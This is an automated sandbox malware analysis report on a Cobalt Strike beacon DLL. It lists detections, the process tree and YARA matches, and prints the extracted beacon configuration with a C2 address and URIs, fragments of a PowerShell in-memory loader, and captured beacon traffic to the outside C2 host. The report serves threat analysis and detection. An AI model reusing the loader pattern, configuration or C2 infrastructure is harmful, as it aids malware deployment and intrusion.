Edit tour

Windows Analysis Report
8082-x86.dll

Overview

General Information

Sample Name:	8082-x86.dll
Analysis ID:	780200
MD5:	8d72fc6ff9cb0971df587d20dda5e8c8
SHA1:	d6031029133084901392b856fe66f00f438d95d9
SHA256:	0b7d19cf030839c3df481069772c7a32b5a3be4c41ce6b436ab69015fa90d98a
Tags:	45139105143CobaltStrikedllopendir
Infos:

Detection

CobaltStrike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected CobaltStrike

C2 URLs / IPs found in malware configuration

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Uses 32bit PE files

Yara signature match

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Uses code obfuscation techniques (call, push, ret)

Detected TCP or UDP traffic on non-standard ports

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Program does not show much activity (idle)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5560 cmdline: loaddll32.exe "C:\Users\user\Desktop\8082-x86.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)

conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5604 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5624 cmdline: rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 5612 cmdline: regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 5632 cmdline: rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5676 cmdline: rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5696 cmdline: rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 8082, "SleepTime": 38500, "MaxGetSize": 1399607, "Jitter": 27, "C2Server": "20.104.209.69,/broadcast", "HttpPostUri": "/1/events/com.amazon.csm.csa.prod", "Malleable_C2_Instructions": ["Remove 1308 bytes from the end", "Remove 1 bytes from the end", "Remove 194 bytes from the beginning", "Base64 decode"], "SpawnTo": "16nKFaB/gr/TtjAg2jiqFg==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 1670873463, "bStageCleanup": "True", "bCFGCaution": "True", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 16700, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "False", "HostHeader": ""}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
8082-x86.dll	CobaltStrike_Resources_Artifact32_v3_14_to_v4_x	Cobalt Strike\'s resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0	gssincla@google.com	0xacb:$pushFmtStr: C7 44 24 28 5C 00 00 00 C7 44 24 24 65 00 00 00 C7 44 24 20 70 00 00 00 C7 44 24 1C 69 00 00 00 C7 44 24 18 70 00 00 00 F7 F1 C7 44 24 14 5C 00 00 00 C7 44 24 10 2E 00 00 00 C7 44 24 0C 5C 00 ... 0x44624:$fmtStr: %c%c%c%c%c%c%c%c%cMSSE-%d-server
8082-x86.dll	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp	CobaltStrike_Sleeve_Beacon_Dll_v4_3_v4_4_v4_5_and_v4_6	Cobalt Strike\'s sleeve/beacon.dll Versions 4.3 and 4.4	gssincla@google.com	0x72da:$version_sig: 48 57 8B F2 83 F8 65 0F 87 47 03 00 00 FF 24 0x96c3:$decoder: 80 B0 20 10 98 00 2E 40 3D 00 10 00 00 7C F1
00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0x1bb8:$: ::FromBase64String("H4s 0x1bb8:$: ::FromBase64String("H4sIA
00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x	Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x	gssincla@google.com	0x1b90:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0x2aa99:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0x1bb8:$: ::FromBase64String("H4s 0x1bb8:$: ::FromBase64String("H4sIA
00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x	Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x	gssincla@google.com	0x1b90:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0x2aa99:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0x1bb8:$: ::FromBase64String("H4s 0x1bb8:$: ::FromBase64String("H4sIA
00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x	Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x	gssincla@google.com	0x1b90:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0x2aa99:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0x1bb8:$: ::FromBase64String("H4s 0x1bb8:$: ::FromBase64String("H4sIA
00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x	Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x	gssincla@google.com	0x1b90:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0x2aa99:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0x1bb8:$: ::FromBase64String("H4s 0x1bb8:$: ::FromBase64String("H4sIA
00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x	Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x	gssincla@google.com	0x1b90:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0x2aa99:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0x1bb8:$: ::FromBase64String("H4s 0x1bb8:$: ::FromBase64String("H4sIA
00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp	CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x	Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x	gssincla@google.com	0x1b90:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0x2aa99:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp	CobaltStrike_Sleeve_BeaconLoader_VA_x86_o_v4_3_v4_4_v4_5_and_v4_6	Cobalt Strike\'s sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6	gssincla@google.com	0x8b0f:$core_sig: C6 45 B0 56 C6 45 B1 69 C6 45 B2 72 C6 45 B3 74 C6 45 B4 75 C6 45 B5 61 C6 45 B6 6C C6 45 B7 41 C6 45 B8 6C C6 45 B9 6C C6 45 BA 6F C6 45 BB 63 C6 45 BC 00 0x82cb:$deobfuscator: 8B 4D FC 83 C1 01 89 4D FC 8B 55 FC 3B 55 0C 73 19 0F B6 45 10 8B 4D 08 03 4D FC 0F BE 11 33 D0 8B 45 08 03 45 FC 88 10 EB D6 0x8f5b:$deobfuscator: 8B 4D FC 83 C1 01 89 4D FC 8B 55 FC 3B 55 0C 73 19 0F B6 45 10 8B 4D 08 03 4D FC 0F BE 11 33 D0 8B 45 08 03 45 FC 88 10 EB D6
00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	FireEye	0x87de:$s0: 83 C6 02 8B 7D D8 B9 40 00 00 00 F3 A4 0F B6 55 18 52 6A 40 8B 45 D8 50 E8 B9 FA FF FF 83 C4 0C 8B 4D D8 51 8B 55 14 52 8B 45 08 8B 48 04 FF D1 0x946e:$s0: 83 C6 02 8B 7D D8 B9 40 00 00 00 F3 A4 0F B6 55 18 52 6A 40 8B 45 D8 50 E8 B9 FA FF FF 83 C4 0C 8B 4D D8 51 8B 55 14 52 8B 45 08 8B 48 04 FF D1 0x8fae:$s1: 0F B7 11 81 FA 4D 5A 00 00 75 2E 8B 45 F8 8B 48 3C 89 4D FC 83 7D FC 40 72 1F 81 7D FC 00 04 00 00 73 16 8B 55 FC 03 55 F8 89 55 FC 8B 45 FC 81 38 50 45 00 00 75 02 EB 0B 8B 4D F8 83 E9 01 89 ...
00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp	CobaltStrike_C2_Encoded_XOR_Config_Indicator	Detects CobaltStrike C2 encoded profile configuration	yara@s3c.za.net	0x30e23:$s046: 2E 2F 2E 2F 2E 2C 2E 2E 2E 2C 2E 2F 2E 2C 31 BC 2E 2D 2E 2C 2E 2A 2E 2E B8 4A 2E 2A 2E 2C 2E 2A 2E 3B 75 19 2E 2B 2E 2F 2E 2C 2E 35
00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x311c5:$xo1: cATGBBO\x01\x1B\x1E
00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x8126:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75 0x8db6:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x31e8a:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x31ef6:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
Process Memory Space: loaddll32.exe PID: 5560	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0x2400:$: ::FromBase64String("H4s 0x4a04b:$: ::FromBase64String("H4s 0x7bb61:$: ::FromBase64String("H4s 0xa4b03:$: ::FromBase64String("H4s 0xcdae8:$: ::FromBase64String("H4s 0xf6a79:$: ::FromBase64String("H4s 0x120144:$: ::FromBase64String("H4s 0x2400:$: ::FromBase64String("H4sIA 0x4a04b:$: ::FromBase64String("H4sIA 0x7bb61:$: ::FromBase64String("H4sIA 0xa4b03:$: ::FromBase64String("H4sIA 0xcdae8:$: ::FromBase64String("H4sIA 0xf6a79:$: ::FromBase64String("H4sIA 0x120144:$: ::FromBase64String("H4sIA
Process Memory Space: loaddll32.exe PID: 5560	CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x	Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x	gssincla@google.com	0x23d8:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0x4a023:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0x7bb39:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0xa4adb:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0xcdac0:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0xf6a51:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0x12011c:$ps1: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String( 0x2b2e1:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 0x72f2c:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 0xa4a42:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 0xcd9e4:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 0xf69c9:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 0x11f95a:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 0x149025:$ps2: ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
Process Memory Space: loaddll32.exe PID: 5560	CobaltStrike_C2_Encoded_XOR_Config_Indicator	Detects CobaltStrike C2 encoded profile configuration	yara@s3c.za.net	0x7a22b:$s046: 2E 2F 2E 2F 2E 2C 2E 2E 2E 2C 2E 2F 2E 2C 31 20 2E 2D 2E 2C 2E 2A 2E 2E 20 4A 2E 2A 2E 2C 2E 2A 2E 3B 75 20 2E 2B 2E 2F 2E 2C 2E 35
Process Memory Space: loaddll32.exe PID: 5560	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Click to see the 21 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8082-x86.dll

Avira: detected

Multi AV Scanner detection for submitted file

Source: 8082-x86.dll	ReversingLabs: Detection: 87%
Source: 8082-x86.dll	Virustotal: Detection: 70%			Perma Link

Machine Learning detection for sample

Source: 8082-x86.dll

Joe Sandbox ML: detected

Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 8082, "SleepTime": 38500, "MaxGetSize": 1399607, "Jitter": 27, "C2Server": "20.104.209.69,/broadcast", "HttpPostUri": "/1/events/com.amazon.csm.csa.prod", "Malleable_C2_Instructions": ["Remove 1308 bytes from the end", "Remove 1 bytes from the end", "Remove 194 bytes from the beginning", "Base64 decode"], "SpawnTo": "16nKFaB/gr/TtjAg2jiqFg==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 1670873463, "bStageCleanup": "True", "bCFGCaution": "True", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 16700, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "False", "HostHeader": ""}

Source: 8082-x86.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 20.104.209.69

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49689

Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: /Origin: https://www.amazon.comx-amz-rid: MTI4NDQwODUyNAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14246Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

TCP traffic: 192.168.2.4:49685 -> 20.104.209.69:8082

Source: Joe Sandbox View

ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS

Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown	TCP traffic detected without corresponding DNS query: 20.104.209.69

Source: loaddll32.exe, 00000000.00000002.620161836.0000000000E2E000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.620169392.0000000000E58000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-8

Source: unknown

HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: */*Origin: https://www.amazon.comx-amz-rid: MTI4NDQwODUyNAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14246Connection: Keep-AliveCache-Control: no-cache

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00951449 _memset,__snprintf,__snprintf,__snprintf,HttpOpenRequestA,InternetQueryDataAvailable,InternetReadFile,InternetCloseHandle,

0_2_00951449

